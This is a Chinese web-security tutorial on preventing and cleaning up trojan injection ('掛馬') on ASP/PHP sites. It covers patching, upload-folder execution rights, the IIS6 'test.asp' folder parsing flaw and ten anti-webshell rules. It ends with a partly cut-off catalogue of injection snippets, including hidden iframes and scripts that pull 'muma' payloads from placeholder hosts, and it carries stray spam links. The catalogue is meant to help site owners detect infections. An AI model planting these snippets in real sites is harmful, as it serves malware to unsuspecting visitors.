萬盛學電腦網

 萬盛學電腦網 >> 病毒防治 >> 如何解決經常性網頁被掛馬

如何解決經常性網頁被掛馬

一、網站被掛木馬

對於網站被人惡意加上一段<script></script><iframe></iframe>的代碼而煩心不已。輕則導致訪問者被迫訪問某些網站或廣告以至機器四機,重則被強制安裝各種木馬病毒,被盜取銀行卡號密碼,QQ密碼等等。
1、在服務器上的防護。出現掛馬現象與服務器漏洞有很大關系,打好補丁,禁止權限及封堵端口,對於扼殺掛馬現象有很大的作用。

2、,網站程序的設置。出於成本的考慮,現在很多小型企業及個人站長喜歡使用各種流行的CMS系統,這種CMS系統由於源代碼開放,所以每隔一小段時間,總能有人找出其漏洞,通過漏洞植入木馬。

在ASP文件最後一行添加:response.end(),在PHP最後一行添加exit();即可。而在於文件頭部植入的木馬,因為添加在頭部,服務器會直接將其發送到浏覽器而不經任何處理。所以程序就派不上任何用場。這種情況的話那麼就只能給予訪客提醒,因為未經程序處理就發送了數據出去,我們在程序中是可以檢測到的,我們只需要寫一段程序,判斷在自己的程序執行之前是否有數據被輸送,如果已經輸送則發送一個alert給浏覽器,告知可能是木馬。

二、如何防止網站被掛馬!
1、為什麼好好的網站會有木馬?
一般木馬是來自ASP SHELL和PHP SHELL的程序段控制不嚴,程序上有上傳功能,沒有進行文件目錄和文件後綴等的判斷,一般這類的目錄,以“海陽頂端網ASP木馬”較為流行。

因2003平台IIS6原因,也存在目錄名問題引起ASP木馬。( 微軟的IIS 6存在嚴重解析文件名錯誤測試辦法:在FTP中建立一個 test.asp 的文件夾,文件夾名就是 test.asp ,在這個文件夾中上傳一個 hack.jpg,這個jpg的內容可以直接是,然後,用IE遠程訪問這個hack.jpg,你可以發現,它一樣被當作是ASP文件來運行!顯然,只要你的網站程序,允許用戶自己建立文件夾及上傳圖片,黑客就可以上傳圖片來當作ASP木馬來運行。

解決辦法:所有使用星外虛擬主機管理平台的虛擬主機用戶,可以在主機面板,設置執行權限選項中,直接將有上傳權限的目錄,取消ASP的運行權限,就可以解決這個問題。
可以參考其他公司的同類公告:
)

大家常用的動易2006和動網,BLOG這類的程序,需要詳細的檢查一下,並跟著開發者進行相應的安全程序升級。這樣才能減少因代碼原因引起的網站被黑。
2、網站被黑了,如何檢查是那些網頁有問題呢。
目前流行的網站被黑,是在相應的asp,htm,js等文件中,插入<iframe src=網站排名 http://www.shwzyh.cn
這樣的,需要使用查找程序來查找這類文件出來,手工刪除此類插入的HTML代碼。這項工作相對比較繁鎖。需要仔細的查找。也會有一些木馬是插入到js中,是js調用方式的。更詳細的資料,請看後部分E.掛馬代碼大全。

3、禁止寫入和目錄禁止執行的功能,二項功能組合,可以有效的防止ASP木馬。這對於常被ASP木馬影響的網站來說,會有一些幫助。
4、防范ASP木馬的十大基本原則
  由於ASP它本身是服務器提供的一貢服務功能,特別是最近由dvbbs的upfile文件出現漏洞以來,其高度的隱蔽性和難查殺性,對網站的安全造成了嚴重的威脅。因此針對ASP木馬的防范和清除,為網管人員提出了更高的技術要求.
  幾個大的程序全部被發現存在上傳漏洞,小程序更是不計其數,讓asp木馬一下占據了主流,得到廣泛的使用,想必如果你是做服務器的話,一定為此頭疼不止吧,特別是虛擬主機的用戶都遇到過網頁被篡改、數據被刪除的經歷,事後除了對這種行徑深惡痛絕外,許多客戶又苦於沒有行之有效的防范措施。鑒於大部
分網站入侵都是利用asp木馬完成的,特寫此文章以使普通虛擬主機用戶能更好地了解、防范asp木馬。也只有空間商和虛擬主機用戶共同做好防范措施才可以有效防范asp木馬!
  我們首先來說一下怎麼樣防范好了,說到防范我們自然要對asp木馬的原理了,大道理我也不講了,網上的文章有的是,簡單的說asp木馬其實就是用asp編寫網站程序,甚至有些asp木馬就是由asp網站管理程序修改而來的。就比如說我們常見的asp站長助手,等等
  它和其他asp程序沒有本質區別,只要是能運行asp的空間就能運行它,這種性質使得asp木馬非常不易被發覺。它和其他asp程序的區別只在於asp木馬是入侵者上傳到目標空間,並幫助入侵者控制目標空間的asp程序。嚴重的從而獲取服務器管理員的權限,要想禁止asp木馬運行就等於禁止asp的運行,顯然這是行不通的,這也是為什麼asp木馬猖獗的原因!有人要問了,是不是就沒有辦法了呢,不,有辦法的:
第一:從源頭入手,入侵者是怎麼樣上傳asp木馬的呢?一般喲幾種方法,通過sql注射手段,獲取管理員權限,通過備份數據庫的功能將asp木馬寫入服務器。或者進入後台通過asp程序的上傳功能的漏洞,上傳木馬等等,當然正常情況下,這些可以上傳文件的asp程序都是有權限限制的,大多也限制了asp文件的上傳。(比如:可以上傳圖片的新聞發布、圖片管理程序,及可以上傳更多類型文件的論壇程序等),如果我們直接上傳asp木馬的話,我們會發現,程序會有提示,是不直接上傳的,但由於存在人為的asp設置錯誤及asp程序本身的漏洞,給了入侵者可乘之機,實現上傳asp木馬。


  因此,防范asp木馬的重點就在於虛擬主機用戶如何確保自己空間中asp上傳程序的安全上,如果你是用別人的程序的話,盡量用出名一點的大型一點的程序,這樣漏洞自然就少一些,而且盡量使用最新的版本,並且要經常去官方網站查看新版本或者是最新補丁,還有就是那些數據庫默認路徑呀,管理員密碼默認呀,一定要改,形成習慣保證程序的安全性。
  那麼如果你是程序員的話,我還想說的一點就是我們在網站程序上也應該盡量從安全的角度上編寫涉及用戶名與口令的程序最好封裝在服務器端,盡量少的在ASP文件裡出現,涉及到與數據庫連接地用戶名與口令應給予最小的權限; 需要經過驗證的ASP頁面,可跟蹤上一個頁面的文件名,只有從上一頁面轉進來的會
話才能讀取這個頁面。防止ASP主頁.inc文件洩露問題; 防止UE等編輯器生成some.asp.bak文件洩露問題等等特別是上傳功能一定要特別注意  上面的只是對客戶的一些要求,但是空間商由於無法預見虛擬主機用戶會在自己站點中上傳什麼樣的程序,以及每個程序是否存在漏洞,因此無法防止入侵者利用站點中客戶程序本身漏洞上傳asp木馬的行為。空間商只能防止入侵者利用已被入侵的站點再次入侵同一服務器上其他站點的行為。這也更加說明要防范asp木馬,虛擬主機用戶就要對自己的程序嚴格把關! 為此我總結了ASP木馬防范的十大原則供大家參考:
  1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程序。網站排名:http://www.shwzyh.cn
  2、對asp上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序。
  這其中包括各種新聞發布、商城及論壇程序,只要可以上傳文件的asp都要進行身份認證!
  3、asp程序管理員的用戶名和密碼要有一定復雜性,不能過於簡單,還要注意定期更換。
  4、到正規網站下載asp程序,下載後要對其數據庫名稱和存放路徑進行修改,數據庫文件名稱也要有一定復雜性。
  5、要盡量保持程序是最新版本。上海網站建設http://www.angshsh.cn
  6、不要在網頁上加注後台管理程序登陸頁面的鏈接。
  7、為防止程序有未知漏洞,可以在維護後刪除後台管理程序的登陸頁面,下次維護時再通過ftp上傳即可。
  8、要時常備份數據庫等重要文件。
  9、日常要多維護,並注意空間中是否有來歷不明的asp文件。記住:一分汗水,換一分安全!
  10、一旦發現被入侵,除非自己能識別出所有木馬文件,否則要刪除所有文件。
 重新上傳文件前,所有asp程序用戶名和密碼都要重置,並要重新修改程序數據庫名稱和存放路徑以及後台管理程序的路徑。
  做好以上防范措施,您的網站只能說是相對安全了,決不能因此疏忽大意,因為入侵與反入侵是一場永恆的戰爭
E.掛馬代碼大全
ps:檢查文件是否被掛馬的時候可以參考下!進出口貿易http://www.uectrade.cn
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js,
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>

三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt>;</script>
muma.txt可改成任意後綴

四:body掛馬
<body onload="window.location='地址';"></body>

五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + 'rn<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js>;</script>")')}

七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:圖片偽裝上海

copyright © 萬盛學電腦網 all rights reserved